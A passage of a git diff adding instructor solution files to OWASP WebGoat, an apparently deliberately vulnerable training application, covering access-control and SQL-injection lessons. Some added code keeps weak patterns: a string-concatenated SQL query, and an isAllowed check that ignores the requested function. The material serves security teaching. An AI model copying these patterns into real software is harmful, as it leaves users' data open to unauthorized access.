+					s.setMessage( "Error deleting employee profile" );
+					sqle.printStackTrace();
+				}
+			}
+			catch ( Exception e )
+			{
+				s.setMessage( "Error deleting employee profile" );
+				e.printStackTrace();
+			}
+		}
+		else
+		{
+			throw new UnauthorizedException(); // FIX
+		}
+	}
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/EditProfile_i.java b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/EditProfile_i.java
new file mode 100644
index 000000000..30920b903
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/EditProfile_i.java
@@ -0,0 +1,101 @@
+package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
+
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.RoleBasedAccessControl.EditProfile;
+import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+
+/**
+ *  Copyright (c) 2006 Free Software Foundation developed under the custody of the Open Web
+ *  Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is published by OWASP
+ *  under the GPL. You should read and accept the LICENSE before you use, modify and/or redistribute
+ *  this software.
+ *
+ */
+
+/*************************************************/
+/*												 */
+/* This file is not currently used in the course */
+/*												 */
+/*************************************************/
+
+public class EditProfile_i extends EditProfile
+{
+	public EditProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName)
+	{
+		super(lesson, lessonName, actionName);
+	}
+
+	public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId)
+			throws UnauthorizedException
+	{
+		// Query the database to determine if this employee has access to this function
+		// Query the database for the profile data of the given employee if "owned" by the given user
+		
+		Employee profile = null;
+		
+		if (s.isAuthorizedInLesson(userId, RoleBasedAccessControl.EDITPROFILE_ACTION)) // FIX
+		{
+			// Query the database for the profile data of the given employee
+			try
+			{
+				String query = "SELECT * FROM employee WHERE userid = ?";
+				
+				try
+				{
+					PreparedStatement answer_statement = WebSession.getConnection(s).prepareStatement( query, 
+							ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+					answer_statement.setInt(1, subjectUserId);
+					ResultSet answer_results = answer_statement.executeQuery();
+					if (answer_results.next())
+					{
+						// Note: Do NOT get the password field.
+						profile = new Employee(
+								answer_results.getInt("userid"),
+								answer_results.getString("first_name"),
+								answer_results.getString("last_name"),
+								answer_results.getString("ssn"),
+								answer_results.getString("title"),
+								answer_results.getString("phone"),
+								answer_results.getString("address1"),
+								answer_results.getString("address2"),
+								answer_results.getInt("manager"),
+								answer_results.getString("start_date"),
+								answer_results.getInt("salary"),
+								answer_results.getString("ccn"),
+								answer_results.getInt("ccn_limit"),
+								answer_results.getString("disciplined_date"),
+								answer_results.getString("disciplined_notes"),
+								answer_results.getString("personal_description"));
+/*						System.out.println("Retrieved employee from db: " + 
+								profile.getFirstName() + " " + profile.getLastName() + 
+								" (" + profile.getId() + ")");
+*/					}
+				}
+				catch ( SQLException sqle )
+				{
+					s.setMessage( "Error getting employee profile" );
+					sqle.printStackTrace();
+				}
+			}
+			catch ( Exception e )
+			{
+				s.setMessage( "Error getting employee profile" );
+				e.printStackTrace();
+			}
+		}
+		else
+		{
+			throw new UnauthorizedException(); // FIX
+		}
+
+		return profile;
+	}
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/RoleBasedAccessControl_i.java b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/RoleBasedAccessControl_i.java
new file mode 100644
index 000000000..eb3b0fc15
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/RoleBasedAccessControl_i.java
@@ -0,0 +1,182 @@
+package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
+
+import org.apache.ecs.ElementContainer;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/**
+ *  Copyright (c) 2006 Free Software Foundation developed under the custody of the Open Web
+ *  Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is published by OWASP
+ *  under the GPL. You should read and accept the LICENSE before you use, modify and/or redistribute
+ *  this software.
+ *
+ */
+
+/* STAGE 2 FIXES
+Solution Summary: Edit RoleBasedAccessControl.java and change handleRequest().  
+                  Modify handleRequest() with lines denoted by // STAGE 2 - FIX.
+Solution Steps: 
+1. This solution adds an access control check in the controller.
+   Point out that their architecture may require the check to occur in the business function.
+2. Look at the RoleBasedAccessControl class identify where execution happens of an action.
+	a. action.handleRequest(s); is not protected by an access control check.
+	b. look at handleRequest(s) to determine where access control check should occur.
+	c. add protection by a programmatic authorization check before dispatching to the action:
+		1. Add an isAuthorized() call before dispatching to the action, 
+		       and throw an unauthorized exception.  Tell student this exception exists. 
+		   Use eclipse command completion to find the isAuthorized() call on the action.  
+		   From command completion - determine calling arguments of isAuthorized()
+		   
+		    				int userId = action.getUserId(s); 
+							if (action.isAuthorized(s, userId, action.getActionName()))
+							{
+								action.handleRequest(s);
+							}
+							else				
+								throw new UnauthorizedException();
+
+Repeat stage 1 and note that the function fails with a "Not authorized" message.
+ Tom will be in the list again, because the DB is reset when lesson restarts.
+ Adding the access check in the RoleBasedAccessControl:handleRequest() is putting the check in the “Controller”
+ The access check can also be added to DeleteProfile.deleteEmployeeProfile(), which is putting the check in the “Business Function”
+*/
+
+public class RoleBasedAccessControl_i extends RoleBasedAccessControl
+{
+	
+	public void handleRequest(WebSession s)
+	{
+		//System.out.println("RoleBasedAccessControl.handleRequest()");
+		if (s.getLessonSession(this) == null)
+			s.openLessonSession(this);
+		
+		String requestedActionName = null;
+		try
+		{
+			requestedActionName = s.getParser().getStringParameter("action");
+		}
+		catch (ParameterNotFoundException pnfe) 
+		{
+			// Missing the action - send them back to login.
+			requestedActionName = LOGIN_ACTION;
+		}
+
+		try
+		{
+			LessonAction action = getAction(requestedActionName);
+			if (action != null)
+			{
+				// FIXME: This code has gotten much uglier
+				//System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " + action.getActionName());
+				if (!action.requiresAuthentication())
+				{
+					// Access to Login does not require authentication.
+					action.handleRequest(s);		
+				}
+				else 
+				{
+					if (action.isAuthenticated(s))
+					{
+						int userId = action.getUserId(s); // STAGE 2 - FIX
+						
+						// action.getActionName() returns the user requested function which
+						// is tied to the button click from the listStaff jsp
+						//
+						// Checking isAuthorized() for the requested action
+						
+						if (action.isAuthorized(s, userId, action.getActionName())) // STAGE 2 - FIX
+						{
+							// Calling the handleRequest() method for the requested action					
+							action.handleRequest(s);
+						}
+						else
+							throw new UnauthorizedException(); // STAGE 2 - FIX
+
+					}
+					else
+						throw new UnauthenticatedException();
+				}
+			}
+			else
+				setCurrentAction(s, ERROR_ACTION);
+		}
+		catch (ParameterNotFoundException pnfe)
+		{
+			System.out.println("Missing parameter");
+			pnfe.printStackTrace();
+			setCurrentAction(s, ERROR_ACTION);												
+		}
+		catch (ValidationException ve)
+		{
+			System.out.println("Validation failed");
+			ve.printStackTrace();
+			setCurrentAction(s, ERROR_ACTION);												
+		}
+		catch (UnauthenticatedException ue)
+		{
+			s.setMessage("Login failed");
+			System.out.println("Authentication failure");
+			ue.printStackTrace();
+		}
+		catch (UnauthorizedException ue2)
+		{
+			String stage = getStage(s);
+			// Update lesson status if necessary.
+			if (STAGE2.equals(stage))
+			{
+				try
+				{
+				if (GoatHillsFinancial.DELETEPROFILE_ACTION.equals(requestedActionName) &&
+						!isAuthorized(s, getUserId(s), GoatHillsFinancial.DELETEPROFILE_ACTION))
+				{
+					setStageComplete(s, STAGE2);
+				}
+				} catch (ParameterNotFoundException pnfe)
+				{
+				pnfe.printStackTrace();
+				}
+			}
+			//System.out.println("isAuthorized() exit stage: " + getStage(s));
+			// Update lesson status if necessary.
+			if (STAGE4.equals(stage))
+			{
+				try
+				{
+				//System.out.println("Checking for stage 4 completion");
+				DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s));
+				int userId = Integer.parseInt((String)s.getRequest().getSession().getAttribute(getLessonName() + "."
+						+ GoatHillsFinancial.USER_ID));
+				int employeeId = s.getParser().getIntParameter(
+					GoatHillsFinancial.EMPLOYEE_ID);
+
+				if (!action.isAuthorizedForEmployee(s, userId, employeeId))
+				{
+				    setStageComplete(s, STAGE4);
+				}
+				} catch (Exception e)
+				{
+					// swallow this - shouldn't happen inthe normal course
+					// e.printStackTrace();
+				}
+			}
+			
+		    s.setMessage("You are not authorized to perform this function");
+		    System.out.println("Authorization failure");
+		    setCurrentAction(s, ERROR_ACTION);
+		    ue2.printStackTrace();
+		}
+		
+		// All this does for this lesson is ensure that a non-null content exists.
+		setContent(new ElementContainer());
+	}
+	
+}
+
+
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/UpdateProfile_i.java b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/UpdateProfile_i.java
new file mode 100644
index 000000000..289097e3d
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/UpdateProfile_i.java
@@ -0,0 +1,140 @@
+package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
+
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
+import org.owasp.webgoat.lessons.RoleBasedAccessControl.UpdateProfile;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+
+/**
+ *  Copyright (c) 2006 Free Software Foundation developed under the custody of the Open Web
+ *  Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is published by OWASP
+ *  under the GPL. You should read and accept the LICENSE before you use, modify and/or redistribute
+ *  this software.
+ *
+ */
+
+/*************************************************/
+/*												 */
+/* This file is not currently used in the course */
+/*												 */
+/*************************************************/
+
+
+public class UpdateProfile_i extends UpdateProfile
+{
+	public UpdateProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
+	{
+		super(lesson, lessonName, actionName, chainedAction);
+	}
+
+	public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee)
+			throws UnauthorizedException
+	{
+		if (s.isAuthorizedInLesson(userId, RoleBasedAccessControl.UPDATEPROFILE_ACTION)) // FIX
+		{
+			try
+			{
+				// Note: The password field is ONLY set by ChangePassword
+					String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
+						+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
+						+ " personal_description = ? WHERE userid = ?;";
+				try
+				{
+					PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+
+					ps.setString(1, employee.getFirstName());
+					ps.setString(2, employee.getLastName());
+					ps.setString(3, employee.getSsn());
+					ps.setString(4, employee.getTitle());
+					ps.setString(5, employee.getPhoneNumber());
+					ps.setString(6, employee.getAddress1());
+					ps.setString(7, employee.getAddress2());
+					ps.setInt(8, employee.getManager());
+					ps.setString(9, employee.getStartDate());
+					ps.setString(10, employee.getCcn());
+					ps.setInt(11, employee.getCcnLimit());
+					ps.setString(12, employee.getPersonalDescription());
+					ps.setInt(13, subjectId);
+					ps.execute();
+				}
+				catch ( SQLException sqle )
+				{
+					s.setMessage( "Error updating employee profile" );
+					sqle.printStackTrace();
+				}
+				
+			}
+			catch ( Exception e )
+			{
+				s.setMessage( "Error updating employee profile" );
+				e.printStackTrace();
+			}		
+		}
+		else
+		{
+			throw new UnauthorizedException(); // FIX
+		}
+	}
+
+
+	public void createEmployeeProfile(WebSession s, int userId, Employee employee)
+			throws UnauthorizedException
+	{
+		if (s.isAuthorizedInLesson(userId, RoleBasedAccessControl.UPDATEPROFILE_ACTION)) // FIX
+		{
+			try
+			{
+				// FIXME: Cannot choose the id because we cannot guarantee uniqueness
+				int nextId = getNextUID(s);
+			    String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
+				
+				//System.out.println("Query:  " + query);
+				
+				try
+				{
+					PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
+
+					ps.setString(1, employee.getFirstName().toLowerCase());
+					ps.setString(2, employee.getLastName());
+					ps.setString(3, employee.getSsn());
+					ps.setString(4, employee.getTitle());
+					ps.setString(5, employee.getPhoneNumber());
+					ps.setString(6, employee.getAddress1());
+					ps.setString(7, employee.getAddress2());
+					ps.setInt(8, employee.getManager());
+					ps.setString(9, employee.getStartDate());
+					ps.setString(10, employee.getCcn());
+					ps.setInt(11, employee.getCcnLimit());
+					ps.setString(12, employee.getDisciplinaryActionDate());
+					ps.setString(13, employee.getDisciplinaryActionNotes());
+					ps.setString(14, employee.getPersonalDescription());
+
+					ps.execute();
+				}
+				catch ( SQLException sqle )
+				{
+					s.setMessage( "Error updating employee profile" );
+					sqle.printStackTrace();
+				}
+			}
+			catch ( Exception e )
+			{
+				s.setMessage( "Error updating employee profile" );
+				e.printStackTrace();
+			}			
+		}
+		else
+		{
+			throw new UnauthorizedException(); // FIX
+		}
+	}
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/ViewProfile_i.java b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/ViewProfile_i.java
new file mode 100644
index 000000000..591c19198
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/ViewProfile_i.java
@@ -0,0 +1,131 @@
+package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.RoleBasedAccessControl.ViewProfile;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+
+/* STAGE 4 FIXES
+1. Find the code location where this flaw of directly retrieving the profile without data-level access control checking exists:
+	public void handleRequest( WebSession s )
+	{	…
+		Employee employee = getEmployeeProfile(s, userId, employeeId);
+	… }
+	public Employee getEmployeeProfile(WebSession s, int employeeId, int subjectUserId) throws UnauthorizedException {	…
+		return getEmployeeProfile(s, employeeId, subjectUserId);
+	… }
+2. The solution requires a data-level access control check to ensure the user has the rights to access the data they are requesting.
+	a. There is a common method you can take advantage of: 
+			isAuthorizedForEmployee(s, userId, subjectUserId)
+		Either tell the student this exists or have them look in DefaultLessonAction.
+		Note that this is not required to implement data access control but is for detection of violations.
+	b. Uncomment the modified query retrieving the user data to have data access control
+	 	String query = "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+						"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;
+3. Bundle the entire logic with this call and throw an unauthorized exception
+			if (isAuthorizedForEmployee(s, userId, subjectUserId))
+			{	...
+				//String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
+				String query = "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+						"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;	// STAGE 4 - FIX
+				...
+			}	
+			else
+			{
+				throw new UnauthorizedException();
+			}
+4. Repeat stage 3 and note that the function fails with a "Not authorized" message.
+Adding the access check in the query is providing data-level access control.
+The access check from isAuthorizedForEmployee is used to detect a violation.
+The same logic could've been applied after the query but isAuthorizedForEmployee provides a nice centralized abstraction of that logic. 
+*/
+
+public class ViewProfile_i extends ViewProfile
+{
+	public ViewProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName)
+	{
+		super(lesson, lessonName, actionName);
+	}
+
+	
+	public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId)
+			throws UnauthorizedException
+	{
+		// Query the database to determine if the given employee is owned by the given user
+		// Query the database for the profile data of the given employee
+		
+		Employee profile = null;
+		
+		// isAuthorizedForEmployee() allows us to determine authorization violations
+		
+		if (isAuthorizedForEmployee(s, userId, subjectUserId))	// STAGE 4 - (ALTERNATE) FIX
+		{	
+			// Query the database for the profile data of the given employee
+			try
+			{
+				//String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;	// STAGE 4 - FIX
+				
+				// Switch to this query to add Data Access Control
+				//
+				// Join employee and ownership to get all valid record combinations
+				//  - qualify on ownership.employer_id  to see only the current userId records
+				//  - qualify on ownership.employee_id to see the current selected employee profile
+
+				String query = "SELECT * FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+						"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;	// STAGE 4 - FIX
+				
+				try
+				{
+					Statement answer_statement = WebSession.getConnection(s).createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+					ResultSet answer_results = answer_statement.executeQuery( query );
+					if (answer_results.next())
+					{
+						// Note: Do NOT get the password field.
+						profile = new Employee(
+								answer_results.getInt("userid"),
+								answer_results.getString("first_name"),
+								answer_results.getString("last_name"),
+								answer_results.getString("ssn"),
+								answer_results.getString("title"),
+								answer_results.getString("phone"),
+								answer_results.getString("address1"),
+								answer_results.getString("address2"),
+								answer_results.getInt("manager"),
+								answer_results.getString("start_date"),
+								answer_results.getInt("salary"),
+								answer_results.getString("ccn"),
+								answer_results.getInt("ccn_limit"),
+								answer_results.getString("disciplined_date"),
+								answer_results.getString("disciplined_notes"),
+								answer_results.getString("personal_description"));
+/*						System.out.println("Retrieved employee from db: " + 
+								profile.getFirstName() + " " + profile.getLastName() + 
+								" (" + profile.getId() + ")");
+*/					}
+				}
+				catch ( SQLException sqle )
+				{
+					s.setMessage( "Error getting employee profile" );
+					sqle.printStackTrace();
+				}
+			}
+			catch ( Exception e )
+			{
+				s.setMessage( "Error getting employee profile" );
+				e.printStackTrace();
+			}
+		}
+		else
+		{
+			throw new UnauthorizedException(); // STAGE 4 - ALTERNATE FIX
+		}
+		
+		return profile;
+	}
+	
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/SQLInjection/Login_i.java b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/SQLInjection/Login_i.java
new file mode 100644
index 000000000..0dea328e5
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/SQLInjection/Login_i.java
@@ -0,0 +1,80 @@
+package org.owasp.webgoat.lessons.instructor.SQLInjection;
+
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.lessons.SQLInjection.Login;
+import org.owasp.webgoat.lessons.SQLInjection.SQLInjection;
+import org.owasp.webgoat.session.WebSession;
+
+/*
+Solution Summary: Edit Login.java and change login().  
+                  Modify login() with lines denoted by // STAGE 2 - FIX.
+Solution Steps:
+1. Change dynamic query to parameterized query.
+   a. Replace the dynamic varaibles with the "?" 
+   		String query = "SELECT * FROM employee WHERE userid = ? and password = ?" 
+   			
+   b. Create a preparedStatement using the new query
+   		PreparedStatement answer_statement = SQLInjection.getConnection(s).prepareStatement( 
+   				query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); 
+
+   c. Set the values of the parameterized query
+		answer_statement.setString(1, userId); // STAGE 2 - FIX
+		answer_statement.setString(2, password); // STAGE 2 - FIX
+   		
+   d. Execute the preparedStatement
+   		ResultSet answer_results = answer_statement.executeQuery();
+*/
+
+public class Login_i extends Login
+{
+	public Login_i(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
+	{
+		super(lesson, lessonName, actionName, chainedAction);
+	}
+
+	public boolean login(WebSession s, String userId, String password)
+	{
+		//System.out.println("Logging in to lesson");
+		boolean authenticated = false;
+		
+		try
+		{
+			String query = "SELECT * FROM employee WHERE userid = ? and password = ?"; // STAGE 2 - FIX
+			
+			try
+			{
+				PreparedStatement answer_statement = WebSession.getConnection(s).prepareStatement( query, 
+						ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); // STAGE 2 - FIX
+				answer_statement.setString(1, userId); // STAGE 2 - FIX
+				answer_statement.setString(2, password); // STAGE 2 - FIX
+				ResultSet answer_results = answer_statement.executeQuery(); // STAGE 2 - FIX
+				if (answer_results.first())
+				{
+					setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE);
+					setSessionAttribute(s, getLessonName() + "." + SQLInjection.USER_ID, userId);
+					authenticated = true;
+				}
+
+			}
+			catch ( SQLException sqle )
+			{
+				s.setMessage( "Error logging in" );
+				sqle.printStackTrace();
+			}
+		}
+		catch ( Exception e )
+		{
+			s.setMessage( "Error logging in" );
+			e.printStackTrace();
+		}
+		
+		//System.out.println("Lesson login result: " + authenticated);
+		return authenticated;
+	}
+	
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/SQLInjection/ViewProfile_i.java b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/SQLInjection/ViewProfile_i.java
new file mode 100644
index 000000000..a7cb75020
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/SQLInjection/ViewProfile_i.java
@@ -0,0 +1,109 @@
+package org.owasp.webgoat.lessons.instructor.SQLInjection;
+
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.SQLInjection.ViewProfile;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.util.HtmlEncoder;
+
+/*
+Solution Summary: Edit ViewProfile.java and change getEmployeeProfile().  
+                  Modify getEmployeeProfile() with lines denoted by // STAGE 4 - FIX.
+
+Solution Steps:
+1. Change dynamic query to parameterized query.
+   a. Replace the dynamic variables with the "?" 
+	Old: String query = "SELECT employee.* " +
+		"FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+		"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;
+
+	New: String query = "SELECT employee.* " +
+		  "FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+		  "ownership.employer_id = ? and ownership.employee_id = ?";
+   			
+   b. Create a preparedStatement using the new query
+   		PreparedStatement answer_statement = SQLInjection.getConnection(s).prepareStatement( 
+   				query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); 
+
+   c. Set the values of the parameterized query
+		answer_statement.setInt(1, Integer.parseInt(userId)); // STAGE 4 - FIX
+		answer_statement.setInt(2, Integer.parseInt(subjectUserId)); // STAGE 4 - FIX
+   		
+   d. Execute the preparedStatement
+   		ResultSet answer_results = answer_statement.executeQuery();
+*/
+
+public class ViewProfile_i extends ViewProfile
+{
+	public ViewProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName)
+	{
+		super(lesson, lessonName, actionName);
+	}
+
+	public Employee getEmployeeProfile(WebSession s, String userId, String subjectUserId)
+			throws UnauthorizedException
+	{
+		// Query the database to determine if this employee has access to this function
+		// Query the database for the profile data of the given employee if "owned" by the given user
+
+		Employee profile = null;
+		
+		try
+		{
+	    		String query = "SELECT employee.* " +
+			  "FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+			  "ownership.employer_id = ? and ownership.employee_id = ?";
+			
+			try
+			{
+				PreparedStatement answer_statement = WebSession.getConnection(s).prepareStatement( query, 
+						ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); // STAGE 4 - FIX
+				answer_statement.setInt(1, Integer.parseInt(userId)); // STAGE 4 - FIX
+				answer_statement.setInt(2, Integer.parseInt(subjectUserId)); // STAGE 4 - FIX
+				ResultSet answer_results = answer_statement.executeQuery(); // STAGE 4 - FIX
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(
+							answer_results.getInt("userid"),
+							answer_results.getString("first_name"),
+							answer_results.getString("last_name"),
+							answer_results.getString("ssn"),
+							answer_results.getString("title"),
+							answer_results.getString("phone"),
+							answer_results.getString("address1"),
+							answer_results.getString("address2"),
+							answer_results.getInt("manager"),
+							answer_results.getString("start_date"),
+							answer_results.getInt("salary"),
+							answer_results.getString("ccn"),
+							answer_results.getInt("ccn_limit"),
+							answer_results.getString("disciplined_date"),
+							answer_results.getString("disciplined_notes"),
+							answer_results.getString("personal_description"));
+/*					System.out.println("Retrieved employee from db: " + 
+							profile.getFirstName() + " " + profile.getLastName() + 
+							" (" + profile.getId() + ")");
+*/				}
+			}
+			catch ( SQLException sqle )
+			{
+				s.setMessage( "Error getting employee profile" );
+				sqle.printStackTrace();
+			}
+		}
+		catch ( Exception e )
+		{
+			s.setMessage( "Error getting employee profile" );
+			e.printStackTrace();
+		}
+		
+		return profile;
+	}
+	
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/servlets/Controller.java b/main/project/JavaSource/org/owasp/webgoat/servlets/Controller.java
new file mode 100644
index 000000000..a28537df3
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/servlets/Controller.java
@@ -0,0 +1 @@
+package org.owasp.webgoat.servlets;

import java.io.IOException;

import javax.servlet.ServletException;

import javax.servlet.http.HttpServlet;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

/*******************************************************************************
 * 
 * 
 * This file is part of WebGoat, an Open Web Application Security Project
 * utility. For details, please see http://www.owasp.org/
 * 
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 * 
 * This program is free software; you can redistribute it and/or modify it under
 * the terms of the GNU General Public License as published by the Free Software
 * Foundation; either version 2 of the License, or (at your option) any later
 * version.
 * 
 * This program is distributed in the hope that it will be useful, but WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
 * details.
 * 
 * You should have received a copy of the GNU General Public License along with
 * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
 * Place - Suite 330, Boston, MA 02111-1307, USA.
 * 
 * Getting Source ==============
 * 
 * Source for this application is maintained at code.google.com, a repository
 * for free software projects.
 * 
 * For details, please see http://code.google.com/p/webgoat/
 */

public class Controller extends HttpServlet

{

    private static final long serialVersionUID = 1L;


    protected void doGet(HttpServletRequest request,
	    HttpServletResponse response) throws ServletException, IOException

    {

	doPost(request, response);

    }


    protected void doPost(HttpServletRequest request,
	    HttpServletResponse response) throws ServletException, IOException

    {

	String userAgent = request.getHeader("user-agent");

	String clientBrowser = "Not known!";

	if (userAgent != null)

	{

	    clientBrowser = userAgent;

	}

	request.setAttribute("client.browser", clientBrowser);

	request.getRequestDispatcher("/view.jsp").forward(request, response);

    }

}
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Authorization.java b/main/project/JavaSource/org/owasp/webgoat/session/Authorization.java
new file mode 100644
index 000000000..e01428c25
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/Authorization.java
@@ -0,0 +1,55 @@
+package org.owasp.webgoat.session;
+
+import java.util.Hashtable;
+import java.util.Map;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class Authorization
+{
+
+    Map<Integer, Integer> permissions = new Hashtable<Integer, Integer>();
+
+
+    public Authorization()
+    {}
+
+
+    public void setPermission(int userId, int functionId)
+    {
+	permissions.put(new Integer(userId), new Integer(functionId));
+    }
+
+
+    public boolean isAllowed(int userId, int functionId)
+    {
+	return (permissions.get(new Integer(userId)) != null);
+    }
